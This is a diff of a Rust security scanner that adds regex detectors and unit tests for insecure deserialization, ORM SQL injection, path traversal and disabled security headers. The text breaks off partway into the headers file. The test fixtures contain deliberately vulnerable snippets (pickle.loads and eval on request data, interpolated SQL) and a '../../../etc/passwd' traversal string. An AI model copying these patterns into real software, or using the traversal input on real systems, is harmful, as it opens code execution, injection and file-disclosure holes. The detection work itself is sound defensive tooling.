2. **8.2** Framework-specific (customer-driven)
3. **8.5** ORM SQL injection (common in enterprise apps)
4. **8.7** Deserialization (critical vulnerabilities)
**Remaining deferred extractors:**
1. **8.2** Framework-specific (HIGH effort - Spring, Django, Express, Rails)
2. **8.3** Config deep parsing (HIGH effort - YAML/JSON AST parsing)
---

View File

@ -40,10 +40,19 @@ impl Default for ExtractorConfig {
"unreal_cpp".to_string(),
"unreal_config".to_string(),
"unreal_performance".to_string(),
// Phase 8: Enterprise extractors
// Phase 8: Enterprise extractors (first batch)
"high_entropy_secrets".to_string(),
"auth_bypass".to_string(),
"insecure_cookies".to_string(),
// Phase 8: Enterprise extractors (second batch)
"path_traversal".to_string(),
"unvalidated_redirects".to_string(),
"weak_password".to_string(),
"security_headers".to_string(),
"insecure_deserialization".to_string(),
"ssrf".to_string(),
"orm_injection".to_string(),
"xxe".to_string(),
],
disabled: vec![],
timeout_config: TimeoutExtractorConfig::default(),

View File

@ -0,0 +1,386 @@
//! Insecure deserialization vulnerability extractor.
//!
//! Detects patterns where untrusted data is deserialized using unsafe methods,
//! which can lead to remote code execution vulnerabilities.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for insecure deserialization vulnerabilities.
///
/// Detects patterns indicating unsafe deserialization:
/// - Python pickle (critical - RCE)
/// - Python yaml.load without SafeLoader
/// - Python marshal
/// - Python eval/exec with user input
/// - JavaScript node-serialize
/// - Go gob without validation
/// - Java ObjectInputStream patterns
pub struct InsecureDeserializationExtractor {
// Python patterns (critical)
python_pickle: Regex,
python_yaml_unsafe: Regex,
python_marshal: Regex,
python_eval: Regex,
// JavaScript patterns
js_serialize: Regex,
// Go patterns
go_gob: Regex,
// Java-style patterns (polyglot detection)
java_ois: Regex,
}
impl Default for InsecureDeserializationExtractor {
fn default() -> Self {
Self::new()
}
}
impl InsecureDeserializationExtractor {
/// Create a new insecure deserialization extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
// Python: pickle (critical - allows arbitrary code execution)
python_pickle: Regex::new(r#"pickle\.(?:loads?|Unpickler)\s*\("#).expect("valid regex"),
// Python: yaml.load without SafeLoader (yaml.safe_load is OK)
// Matches yaml.load( but not yaml.safe_load(
python_yaml_unsafe: Regex::new(r#"yaml\.(?:load|unsafe_load)\s*\([^)]*(?:\)|,[^S])"#)
.expect("valid regex"),
// Python: marshal (unsafe, similar to pickle)
python_marshal: Regex::new(r#"marshal\.loads?\s*\("#).expect("valid regex"),
// Python: eval/exec with user input
python_eval: Regex::new(
r#"(?:eval|exec)\s*\(\s*(?:request\.|params\.|input|user|data)"#,
)
.expect("valid regex"),
// JavaScript: node-serialize (known vulnerable)
js_serialize: Regex::new(
r#"(?:require\s*\(\s*["']node-serialize["']\)|\.unserialize\s*\()"#,
)
.expect("valid regex"),
// Go: gob decoder (can be unsafe with untrusted input)
go_gob: Regex::new(r#"gob\.(?:NewDecoder|Decode)\s*\("#).expect("valid regex"),
// Java-style patterns (for polyglot detection in config files, etc.)
java_ois: Regex::new(r#"ObjectInputStream|readObject\s*\(\)"#).expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
method: &str,
confidence: f32,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["serialization", "deserialization"],
"deserialize_method",
ObjectValue::Text(method.to_string()),
file,
line,
matched,
confidence,
description,
)
}
}
impl Extractor for InsecureDeserializationExtractor {
fn name(&self) -> &str {
"insecure_deserialization"
}
fn languages(&self) -> &[Language] {
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
match language {
Language::Python => {
// Pickle (critical - RCE)
if let Some(m) = self.python_pickle.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"pickle",
0.95,
"pickle deserialization allows arbitrary code execution (CRITICAL)",
));
}
// yaml.load without SafeLoader
if let Some(m) = self.python_yaml_unsafe.find(line) {
// Check if SafeLoader is used on the same line
if !line.contains("SafeLoader") && !line.contains("safe_load") {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"yaml_unsafe",
0.85,
"yaml.load without SafeLoader allows code execution",
));
}
}
// marshal
if let Some(m) = self.python_marshal.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"marshal",
0.9,
"marshal deserialization is unsafe with untrusted data",
));
}
// eval/exec with user input
if let Some(m) = self.python_eval.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"eval",
0.95,
"eval/exec with user input allows arbitrary code execution (CRITICAL)",
));
}
}
Language::JavaScript | Language::TypeScript => {
// node-serialize (known vulnerable)
if let Some(m) = self.js_serialize.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"node_serialize",
0.95,
"node-serialize is vulnerable to remote code execution (CVE-2017-5941)",
));
}
}
Language::Go => {
// gob decoder
if let Some(m) = self.go_gob.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"gob",
0.75, // Lower confidence - gob is safer but can still be problematic
"gob deserialization with untrusted input may be unsafe",
));
}
}
_ => {}
}
// Check for Java patterns in any language (polyglot detection)
if let Some(m) = self.java_ois.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"java_ois",
0.85,
"Java ObjectInputStream deserialization is vulnerable to RCE",
));
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_python_pickle() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
data = pickle.loads(request.data)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("CRITICAL"));
assert!(claims[0].confidence >= 0.9);
}
#[test]
fn test_python_pickle_load() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
with open('data.pkl', 'rb') as f:
obj = pickle.load(f)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_python_yaml_unsafe() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
data = yaml.load(file_content)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "config.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("SafeLoader"));
}
#[test]
fn test_python_yaml_safe_no_detection() {
let extractor = InsecureDeserializationExtractor::new();
// Safe: using SafeLoader
let content = r#"
data = yaml.load(file_content, Loader=yaml.SafeLoader)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "config.py");
assert!(claims.is_empty());
}
#[test]
fn test_python_marshal() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
obj = marshal.loads(data)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_python_eval() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
result = eval(request.data)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("CRITICAL"));
}
#[test]
fn test_js_node_serialize_require() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
const s = require('node-serialize');
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert_eq!(claims.len(), 1); // require pattern
}
#[test]
fn test_js_unserialize() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
const obj = s.unserialize(data);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert_eq!(claims.len(), 1); // unserialize pattern
}
#[test]
fn test_go_gob() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
dec := gob.NewDecoder(reader)
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "handler.go");
assert_eq!(claims.len(), 1); // NewDecoder
}
#[test]
fn test_go_gob_decode() {
let extractor = InsecureDeserializationExtractor::new();
let content = r#"
err := gob.Decode(&data)
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "handler.go");
assert_eq!(claims.len(), 1); // Decode
}
#[test]
fn test_java_ois_polyglot() {
let extractor = InsecureDeserializationExtractor::new();
// Java pattern detected in any language
let content = r#"
ObjectInputStream ois = new ObjectInputStream(inputStream);
Object obj = ois.readObject();
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "mixed.py");
assert_eq!(claims.len(), 2); // ObjectInputStream and readObject
}
}

View File

@ -18,6 +18,14 @@
//! - `high_entropy_secrets`: High-entropy strings likely to be leaked secrets
//! - `auth_bypass`: Authentication bypass patterns (hardcoded creds, debug auth)
//! - `insecure_cookies`: Cookies missing Secure/HttpOnly flags
//! - `path_traversal`: File operations with user-controlled paths
//! - `unvalidated_redirects`: HTTP redirects with user-controlled URLs
//! - `weak_password`: Weak password policy configurations
//! - `security_headers`: Missing or disabled security headers
//! - `insecure_deserialization`: Unsafe deserialization (pickle, yaml.load, etc.)
//! - `ssrf`: HTTP requests with user-controlled URLs
//! - `orm_injection`: ORM methods with string interpolation
//! - `xxe`: XML parsing without external entity protection
//!
//! # Declarative Extractors
//!
@ -32,10 +40,15 @@ mod dep_versions;
mod hardcoded_secrets;
mod high_entropy;
mod insecure_cookies;
mod insecure_deserialization;
mod jwt_config;
mod orm_injection;
mod path_traversal;
mod rate_limit;
mod registry;
mod security_headers;
mod sql_injection;
mod ssrf;
mod timeout_config;
mod tls_verify;
mod tls_version;
@ -43,7 +56,10 @@ mod traits;
mod unreal_config;
mod unreal_cpp;
mod unreal_performance;
mod unvalidated_redirects;
mod weak_crypto;
mod weak_password;
mod xxe;
pub use auth_bypass::AuthBypassExtractor;
pub use command_injection::CommandInjectionExtractor;
@ -55,10 +71,15 @@ pub use dep_versions::DepVersionsExtractor;
pub use hardcoded_secrets::HardcodedSecretsExtractor;
pub use high_entropy::HighEntropySecretsExtractor;
pub use insecure_cookies::InsecureCookiesExtractor;
pub use insecure_deserialization::InsecureDeserializationExtractor;
pub use jwt_config::JwtConfigExtractor;
pub use orm_injection::OrmInjectionExtractor;
pub use path_traversal::PathTraversalExtractor;
pub use rate_limit::{RateLimitExtractor, RateLimitThresholds};
pub use registry::ExtractorRegistry;
pub use security_headers::SecurityHeadersExtractor;
pub use sql_injection::SqlInjectionExtractor;
pub use ssrf::SsrfExtractor;
pub use timeout_config::{TimeoutConfigExtractor, TimeoutThresholds};
pub use tls_verify::TlsVerifyExtractor;
pub use tls_version::TlsVersionExtractor;
@ -66,4 +87,7 @@ pub use traits::{build_claim, is_test_file, Extractor};
pub use unreal_config::UnrealConfigExtractor;
pub use unreal_cpp::UnrealCppExtractor;
pub use unreal_performance::UnrealPerformanceExtractor;
pub use unvalidated_redirects::UnvalidatedRedirectsExtractor;
pub use weak_crypto::WeakCryptoExtractor;
pub use weak_password::WeakPasswordExtractor;
pub use xxe::XxeExtractor;

View File

@ -0,0 +1,370 @@
//! ORM SQL injection vulnerability extractor.
//!
//! Detects patterns where ORM methods are used with string interpolation
//! instead of proper parameterized queries, which can lead to SQL injection.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for ORM-specific SQL injection vulnerabilities.
///
/// Detects patterns indicating unsafe query construction in popular ORMs:
/// - Django: .raw() and .extra() with string interpolation
/// - SQLAlchemy: text() and execute() with f-strings
/// - Sequelize: query() with template literals
/// - TypeORM: where() with template literals
/// - GORM: Raw() with fmt.Sprintf
/// - Prisma: $queryRawUnsafe with interpolation
pub struct OrmInjectionExtractor {
// Django patterns
django_raw: Regex,
django_extra: Regex,
// SQLAlchemy patterns
sqlalchemy_text: Regex,
sqlalchemy_exec: Regex,
// Sequelize patterns
sequelize_raw: Regex,
// TypeORM patterns
typeorm_where: Regex,
// GORM patterns
gorm_raw: Regex,
// Prisma patterns
prisma_raw: Regex,
}
impl Default for OrmInjectionExtractor {
fn default() -> Self {
Self::new()
}
}
impl OrmInjectionExtractor {
/// Create a new ORM injection extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
// Django: raw/extra with formatting
django_raw: Regex::new(r#"\.raw\s*\(\s*(?:f["']|["'][^"']*\{[^}]*\}["']\.format)"#)
.expect("valid regex"),
django_extra: Regex::new(r#"\.extra\s*\([^)]*where\s*=\s*\[.*(?:f["']|%)"#)
.expect("valid regex"),
// SQLAlchemy: text with formatting
sqlalchemy_text: Regex::new(r#"text\s*\(\s*(?:f["']|["'][^"']*%|["'][^"']*\.format)"#)
.expect("valid regex"),
sqlalchemy_exec: Regex::new(r#"\.execute\s*\(\s*(?:f["']|["'][^"']*\{)"#)
.expect("valid regex"),
// Sequelize: raw query interpolation
sequelize_raw: Regex::new(r#"sequelize\.query\s*\(\s*`[^`]*\$\{"#)
.expect("valid regex"),
// TypeORM: where with interpolation
typeorm_where: Regex::new(r#"\.(?:where|andWhere|orWhere)\s*\(\s*`[^`]*\$\{"#)
.expect("valid regex"),
// GORM: Raw with Sprintf
gorm_raw: Regex::new(r#"\.Raw\s*\(\s*(?:fmt\.Sprintf|"[^"]*"\s*\+)"#)
.expect("valid regex"),
// Prisma: $queryRawUnsafe
prisma_raw: Regex::new(r#"\$queryRawUnsafe\s*\(\s*`[^`]*\$\{"#).expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
orm: &str,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["db", "orm", "query"],
"query_construction",
ObjectValue::Text(format!("interpolated_{}", orm)),
file,
line,
matched,
0.9,
description,
)
}
}
impl Extractor for OrmInjectionExtractor {
fn name(&self) -> &str {
"orm_injection"
}
fn languages(&self) -> &[Language] {
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
match language {
Language::Python => {
// Django raw queries
if let Some(m) = self.django_raw.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"django",
"Django .raw() with string interpolation (SQL injection risk)",
));
}
// Django extra queries
if let Some(m) = self.django_extra.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"django",
"Django .extra() with interpolation (SQL injection risk)",
));
}
// SQLAlchemy text
if let Some(m) = self.sqlalchemy_text.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"sqlalchemy",
"SQLAlchemy text() with interpolation (SQL injection risk)",
));
}
// SQLAlchemy execute
if let Some(m) = self.sqlalchemy_exec.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"sqlalchemy",
"SQLAlchemy execute() with f-string (SQL injection risk)",
));
}
}
Language::JavaScript | Language::TypeScript => {
// Sequelize raw query
if let Some(m) = self.sequelize_raw.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"sequelize",
"Sequelize raw query with template literal (SQL injection risk)",
));
}
// TypeORM where
if let Some(m) = self.typeorm_where.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"typeorm",
"TypeORM where() with template literal (SQL injection risk)",
));
}
// Prisma queryRawUnsafe
if let Some(m) = self.prisma_raw.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"prisma",
"Prisma $queryRawUnsafe with interpolation (SQL injection risk)",
));
}
}
Language::Go => {
// GORM Raw
if let Some(m) = self.gorm_raw.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"gorm",
"GORM Raw() with fmt.Sprintf (SQL injection risk)",
));
}
}
_ => {}
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_django_raw_fstring() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
users = User.objects.raw(f"SELECT * FROM users WHERE name = '{name}'")
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "views.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("db/orm/query"));
}
#[test]
fn test_django_raw_format() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
users = User.objects.raw("SELECT * FROM users WHERE id = {}".format(user_id))
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "views.py");
// This matches the django_raw pattern (has {} and .format)
assert_eq!(claims.len(), 1);
}
#[test]
fn test_sqlalchemy_text() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
result = session.execute(text(f"SELECT * FROM users WHERE id = {user_id}"))
"#;
let claims = extractor.extract(&["python".to_string()], content, Language::Python, "db.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("SQLAlchemy"));
}
#[test]
fn test_sqlalchemy_execute_fstring() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
conn.execute(f"UPDATE users SET name = '{name}' WHERE id = {id}")
"#;
let claims = extractor.extract(&["python".to_string()], content, Language::Python, "db.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_sequelize_raw() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
const users = await sequelize.query(`SELECT * FROM users WHERE id = ${userId}`);
"#;
let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "db.js");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("Sequelize"));
}
#[test]
fn test_typeorm_where() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
const user = await userRepo.createQueryBuilder("user")
.where(`user.id = ${userId}`)
.getOne();
"#;
let claims =
extractor.extract(&["ts".to_string()], content, Language::TypeScript, "user.ts");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_gorm_raw() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
db.Raw(fmt.Sprintf("SELECT * FROM users WHERE id = %d", userID)).Scan(&user)
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "repo.go");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("GORM"));
}
#[test]
fn test_prisma_query_raw_unsafe() {
let extractor = OrmInjectionExtractor::new();
let content = r#"
const users = await prisma.$queryRawUnsafe(`SELECT * FROM users WHERE id = ${userId}`);
"#;
let claims = extractor.extract(&["ts".to_string()], content, Language::TypeScript, "db.ts");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("Prisma"));
}
#[test]
fn test_no_false_positives_parameterized() {
let extractor = OrmInjectionExtractor::new();
// Safe: parameterized query - no f-string, no .format(), just %s placeholder
let content = r#"
users = User.objects.raw("SELECT * FROM users WHERE id = ?", [user_id])
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "views.py");
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positives_orm_filter() {
let extractor = OrmInjectionExtractor::new();
// Safe: using ORM filter methods
let content = r#"
users = User.objects.filter(id=user_id)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "views.py");
assert!(claims.is_empty());
}
}

View File

@ -0,0 +1,348 @@
//! Path traversal vulnerability extractor.
//!
//! Detects patterns where file system operations use user-controlled input
//! without proper validation, which can lead to directory traversal attacks.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for path traversal vulnerabilities.
///
/// Detects patterns indicating unsafe file path handling:
/// - File operations with user-controlled input
/// - Path.join/filepath.Join with request parameters
/// - sendFile/res.download with user input
/// - Direct traversal literals (../ or %2e%2e)
pub struct PathTraversalExtractor {
// Python patterns
python_open_user: Regex,
python_path_join: Regex,
// JavaScript/TypeScript patterns
js_fs_user: Regex,
js_path_join: Regex,
js_sendfile: Regex,
// Go patterns
go_filepath: Regex,
// Rust patterns
rust_path_user: Regex,
// Universal patterns
traversal_literal: Regex,
}
impl Default for PathTraversalExtractor {
fn default() -> Self {
Self::new()
}
}
impl PathTraversalExtractor {
/// Create a new path traversal extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
// Python: file ops with user input
python_open_user: Regex::new(
r#"(?:open|read|write)\s*\([^)]*(?:request\.|params\[|input|user)"#,
)
.expect("valid regex"),
python_path_join: Regex::new(
r#"os\.path\.join\s*\([^)]*(?:request\.|params\[|input|user)"#,
)
.expect("valid regex"),
// JavaScript: fs/path with user input
js_fs_user: Regex::new(
r#"fs\.(?:readFile|writeFile|createReadStream|readFileSync|writeFileSync)\s*\([^)]*(?:req\.|params\.|query\.)"#,
)
.expect("valid regex"),
js_path_join: Regex::new(
r#"path\.(?:join|resolve)\s*\([^)]*(?:req\.|params\.|query\.)"#,
)
.expect("valid regex"),
js_sendfile: Regex::new(r#"res\.(?:sendFile|download)\s*\([^)]*(?:req\.|params\.)"#)
.expect("valid regex"),
// Go: filepath with user input
go_filepath: Regex::new(
r#"(?:filepath\.Join|os\.Open|os\.ReadFile|ioutil\.ReadFile)\s*\([^)]*(?:r\.|req\.|c\.)"#,
)
.expect("valid regex"),
// Rust: path operations with user input
rust_path_user: Regex::new(
r#"(?:Path::new|PathBuf::from|std::fs::read|std::fs::write)\s*\([^)]*(?:request|params|query|user)"#,
)
.expect("valid regex"),
// Universal: direct traversal literals
traversal_literal: Regex::new(r#"\.\.[\\/]|%2e%2e|%2E%2E"#).expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
category: &str,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["filesystem", "path", category],
"user_controlled_path",
ObjectValue::Boolean(true),
file,
line,
matched,
0.85,
description,
)
}
}
impl Extractor for PathTraversalExtractor {
fn name(&self) -> &str {
"path_traversal"
}
fn languages(&self) -> &[Language] {
&[
Language::Python,
Language::JavaScript,
Language::TypeScript,
Language::Go,
Language::Rust,
]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
// Check for traversal literals in any language
if let Some(m) = self.traversal_literal.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"traversal",
"Path contains directory traversal sequence (../)",
));
}
// Language-specific patterns
match language {
Language::Python => {
if let Some(m) = self.python_open_user.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"file_operation",
"File operation with user-controlled path (path traversal risk)",
));
}
if let Some(m) = self.python_path_join.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"path_construction",
"os.path.join with user input (path traversal risk)",
));
}
}
Language::JavaScript | Language::TypeScript => {
if let Some(m) = self.js_fs_user.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"file_operation",
"fs operation with user-controlled path (path traversal risk)",
));
}
if let Some(m) = self.js_path_join.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"path_construction",
"path.join/resolve with user input (path traversal risk)",
));
}
if let Some(m) = self.js_sendfile.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"file_serving",
"res.sendFile with user input (path traversal risk)",
));
}
}
Language::Go => {
if let Some(m) = self.go_filepath.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"file_operation",
"Filepath operation with user input (path traversal risk)",
));
}
}
Language::Rust => {
if let Some(m) = self.rust_path_user.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"file_operation",
"Path operation with user input (path traversal risk)",
));
}
}
_ => {}
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_python_open_user_input() {
let extractor = PathTraversalExtractor::new();
let content = r#"
file = open(request.GET['filename'], 'r')
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("filesystem/path"));
}
#[test]
fn test_python_path_join() {
let extractor = PathTraversalExtractor::new();
let content = r#"
path = os.path.join(base_dir, request.args['file'])
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_fs_read() {
let extractor = PathTraversalExtractor::new();
let content = r#"
fs.readFileSync(req.query.file);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_sendfile() {
let extractor = PathTraversalExtractor::new();
let content = r#"
res.sendFile(req.params.filename);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_go_filepath() {
let extractor = PathTraversalExtractor::new();
let content = r#"
path := filepath.Join(baseDir, r.URL.Query().Get("file"))
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "main.go");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_traversal_literal() {
let extractor = PathTraversalExtractor::new();
let content = r#"
path := "../../../etc/passwd"
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "main.go");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("traversal sequence"));
}
#[test]
fn test_encoded_traversal() {
let extractor = PathTraversalExtractor::new();
let content = r#"
url := "%2e%2e%2fconfig"
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "main.go");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_no_false_positives_safe_path() {
let extractor = PathTraversalExtractor::new();
// Safe: no user input
let content = r#"
fs.readFileSync('./config.json');
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert!(claims.is_empty());
}
}

View File

@ -13,9 +13,14 @@ use super::dep_versions::DepVersionsExtractor;
use super::hardcoded_secrets::HardcodedSecretsExtractor;
use super::high_entropy::HighEntropySecretsExtractor;
use super::insecure_cookies::InsecureCookiesExtractor;
use super::insecure_deserialization::InsecureDeserializationExtractor;
use super::jwt_config::JwtConfigExtractor;
use super::orm_injection::OrmInjectionExtractor;
use super::path_traversal::PathTraversalExtractor;
use super::rate_limit::RateLimitExtractor;
use super::security_headers::SecurityHeadersExtractor;
use super::sql_injection::SqlInjectionExtractor;
use super::ssrf::SsrfExtractor;
use super::timeout_config::{TimeoutConfigExtractor, TimeoutThresholds};
use super::tls_verify::TlsVerifyExtractor;
use super::tls_version::TlsVersionExtractor;
@ -23,7 +28,10 @@ use super::traits::Extractor;
use super::unreal_config::UnrealConfigExtractor;
use super::unreal_cpp::UnrealCppExtractor;
use super::unreal_performance::UnrealPerformanceExtractor;
use super::unvalidated_redirects::UnvalidatedRedirectsExtractor;
use super::weak_crypto::WeakCryptoExtractor;
use super::weak_password::WeakPasswordExtractor;
use super::xxe::XxeExtractor;
/// Registry of available extractors.
pub struct ExtractorRegistry {
@ -116,6 +124,31 @@ impl ExtractorRegistry {
if is_enabled("insecure_cookies") {
extractors.push(Box::new(InsecureCookiesExtractor::new()));
}
// Phase 8: Enterprise security extractors
if is_enabled("path_traversal") {
extractors.push(Box::new(PathTraversalExtractor::new()));
}
if is_enabled("unvalidated_redirects") {
extractors.push(Box::new(UnvalidatedRedirectsExtractor::new()));
}
if is_enabled("weak_password") {
extractors.push(Box::new(WeakPasswordExtractor::new()));
}
if is_enabled("security_headers") {
extractors.push(Box::new(SecurityHeadersExtractor::new()));
}
if is_enabled("insecure_deserialization") {
extractors.push(Box::new(InsecureDeserializationExtractor::new()));
}
if is_enabled("ssrf") {
extractors.push(Box::new(SsrfExtractor::new()));
}
if is_enabled("orm_injection") {
extractors.push(Box::new(OrmInjectionExtractor::new()));
}
if is_enabled("xxe") {
extractors.push(Box::new(XxeExtractor::new()));
}
// Register declarative extractors from config
// Declarative extractors are always enabled unless explicitly disabled.
@ -199,7 +232,7 @@ mod tests {
use crate::extractors::declarative::{DeclarativeClaimDef, DeclarativeValue};
/// Number of built-in extractors (not counting declarative).
const BUILTIN_EXTRACTOR_COUNT: usize = 17;
const BUILTIN_EXTRACTOR_COUNT: usize = 25;
#[test]
fn test_registry_creation() {

View File

@ -0,0 +1,359 @@
//! Missing security headers extractor.
//!
//! Detects patterns where security headers are explicitly disabled or
//! configured insecurely.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for missing or disabled security headers.
///
/// Detects patterns indicating insecure header configurations:
/// - X-Frame-Options disabled or set to ALLOWALL
/// - X-Content-Type-Options disabled
/// - X-XSS-Protection disabled
/// - HSTS disabled
/// - Content-Security-Policy disabled
pub struct SecurityHeadersExtractor {
// Explicit header disabled
header_disabled: Regex,
// Django missing secure settings
django_missing: Regex,
// YAML headers disabled
yaml_disabled: Regex,
// Frame options ALLOWALL
frame_allowall: Regex,
// CSP disabled or unsafe
csp_unsafe: Regex,
// HSTS disabled
hsts_disabled: Regex,
}
impl Default for SecurityHeadersExtractor {
fn default() -> Self {
Self::new()
}
}
impl SecurityHeadersExtractor {
/// Create a new security headers extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
